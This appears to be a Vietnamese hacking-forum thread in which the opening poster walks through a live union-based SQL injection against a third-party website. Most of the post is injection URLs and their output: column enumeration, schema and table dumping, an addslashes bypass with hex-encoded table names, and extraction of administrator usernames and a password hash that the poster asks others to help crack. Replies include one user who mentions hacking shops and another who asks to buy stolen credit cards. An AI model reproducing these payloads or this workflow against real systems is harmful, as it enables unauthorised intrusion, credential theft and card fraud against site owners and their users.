Gặp lỗi khi tấn công SQL Injection

Nhóm Hắc Ker Tê — GMT

Chào mọi người, mình mò mãi được 1 site nước ngoài bị lỗi SQL Injection mà có thể khai thác qua phương pháp Inband, nên tập tấn công thử xem, đây là 1 phương pháp đơn giản và dể dàng nhất đối với anh em biết đến SQL Injection, nhưng còn vấp phải 1 số lỗi, cụ thể mình xin trình bày nhanh: Trước tiên mình cũng xin gửi lời cám ơn đến 2 ad talentkong và xiuchac bên diễn đàn ceh.vn đã giúp đỡ mình trong các thao tác. Trang mình làm dạng là: Code:

http://www.abc.co.uk/node.php?id=1

chạy ok không lỗi tiếp theo chạy Code:

http://www.abc.co.uk/node.php?id=1'

ok đã thấy lỗi SQL Injection Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Tiếp theo tìm số cột bằng cách chạy Code:

http://www.abc.co.uk/node.php?id=1 order by 1--

rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong Tiếp theo chạy Code:

http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--

để tìm số cột bị lỗi và ở đây nó báo là 4 Tiếp theo chạy Code:

http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--

để lấy version database thì thấy hiện Code:

5.1.73-log

Tiếp theo chay Code:

http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--

để lấy tên database thì thấy báo Code:

information_schema,db312892314

ok bước này xong Tiếp theo chạy Code:

http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--

để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau Code:

administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos

Tiếp theo chạy Code:

http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--

đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được. thấy hiện lên các cột Code:

id, user_name,user_password

ok bước này xong Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators Mình chạy truy vấn sau Code:

http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -

thì đã lấy được user và pass nhưng pass dạng sau Code:

$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.

thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ? Xin anh em xem giúp với

Gặp lỗi khi tấn công SQL Injection

StarGhost — GMT

Các site decrypt online thường tìm pass trong database sẵn có, nên việc không tìm thấy là chuyện thường. Mình không biết Wordpress tạo password như thế nào, nhưng nhìn dài thế kia mà nếu là MD5 thì ắt hẳn là có salt, nên việc tìm không ra password là điều hiển nhiên.

Gặp lỗi khi tấn công SQL Injection

hackeraku — GMT

chịu ròi bờ lồ bỏ thời gian đi giải mã thôi mình hack 1 shop mới có vẻ ngon hơn :^)

Gặp lỗi khi tấn công SQL Injection

ecolitez — GMT

hackeraku wrote:

chịu ròi bờ lồ bỏ thời gian đi giải mã thôi mình hack 1 shop mới có vẻ ngon hơn :^)

Có AE nào sell cc ko? mình đang gần mua.

Gặp lỗi khi tấn công SQL Injection

chupichu — GMT

Dạo này HVA bị bỏ bê nhiều quá, không còn như xưa, đến hỏi mua cc cũng ko ai xoá bài. P/s: Vẫn còn website dính sql à ? Hàng hiếm quá.

Gặp lỗi khi tấn công SQL Injection

vnsec_net — GMT

Đọc từ đầu đến cuối thì thấy chủ thread đang viết TUT hack website qua SQL Injection :)).

Gặp lỗi khi tấn công SQL Injection

Ezzy Auditore — GMT

:v vẫn còn web dính cá SQL Injectioni này à :v hàng này bây giờ khó kiếm :)

Gặp lỗi khi tấn công SQL Injection

kimsonha — GMT

SQL Injection này giờ dính đầy, chủ yếu là có vượt qua firewall được không thôi bạn.

Latest posts for the topic "Gặp lỗi khi tấn công SQL Injection"

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection

Gặp lỗi khi tấn công SQL Injection